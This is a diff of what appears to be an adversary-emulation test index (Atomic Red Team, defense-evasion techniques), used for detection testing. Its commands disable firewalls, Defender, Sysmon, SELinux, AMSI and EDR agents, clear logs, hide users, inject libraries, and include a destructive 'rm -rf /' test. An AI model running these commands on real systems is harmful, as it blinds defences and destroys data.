#{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) - ' +' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} - ' +' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1578.003: @@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present - ' +' prereq_command: 'which python3 - ' +' get_prereq_command: 'echo "Please install Python 3" - ' +' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present - ' +' prereq_command: 'which perl - ' +' get_prereq_command: 'echo "Please install Perl" - ' +' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present - ' +' prereq_command: 'which xxd - ' +' get_prereq_command: 'echo "Please install xxd" - ' +' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail - ' +' supported_platforms: - iaas:aws input_arguments: @@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false - ' +' cleanup_command: 'wevtutil sl "#{log_name}" /e:true - ' +' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off - ' +' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 - ' +' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f - ' +' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 @@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 - ' +' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw disable - ' +' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'systemctl stop ufw - ' +' cleanup_command: | systemctl start ufw systemctl status ufw @@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw logging off - ' +' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules - ' +' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf @@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. - ' +' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw - ' +' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. - ' +' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log - ' +' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection - ' +' supported_platforms: - linux input_arguments: @@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: command: 'setenforce 0 - ' +' cleanup_command: 'setenforce 1 - ' +' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux - ' +' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: @@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper - ' +' supported_platforms: - macos executor: command: 'sudo spctl --master-disable - ' +' cleanup_command: 'sudo spctl --master-enable - ' +' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS - ' +' supported_platforms: - macos input_arguments: @@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded - ' +' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed - ' +' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded - ' +' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available - ' +' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null @@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed - ' +' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} - ' +' get_prereq_command: 'cmd /c sysmon -i -accepteula - ' +' executor: command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null - ' +' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. - ' +' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. - ' +' supported_platforms: - windows input_arguments: @@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. - ' +' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed - ' +' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} - ' +' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} - ' +' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments: @@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} - ' +' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} - ' +' executor: command: 'del /f #{file_to_delete} - ' +' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'mkdir #{folder_to_delete} - ' +' executor: command: 'rmdir /s /q #{folder_to_delete} - ' +' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null - ' +' executor: command: 'Remove-Item -path #{file_to_delete} - ' +' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 @@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null - ' +' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse - ' +' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. - ' +' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null - ' +' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) - ' +' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) - ' +' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null - ' +' executor: command: 'Remove-Item #{teamviewer_log_file} - ' +' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line - ' +' supported_platforms: - macos input_arguments: @@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} - ' +' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +s #{file_to_modify} - ' +' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib @@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) - ' +' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} - ' +' executor: command: 'attrib.exe +h #{file_to_modify} - ' +' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #{filename} - ' +' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt - ' +' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) - ' +' supported_platforms: - macos input_arguments: @@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin - ' +' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 - ' +' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} - ' +' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} - ' +' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore - ' +' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos @@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files - ' +' supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. - ' +' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: - ' +' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: - ' +' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} - ' +' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" - ' +' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: 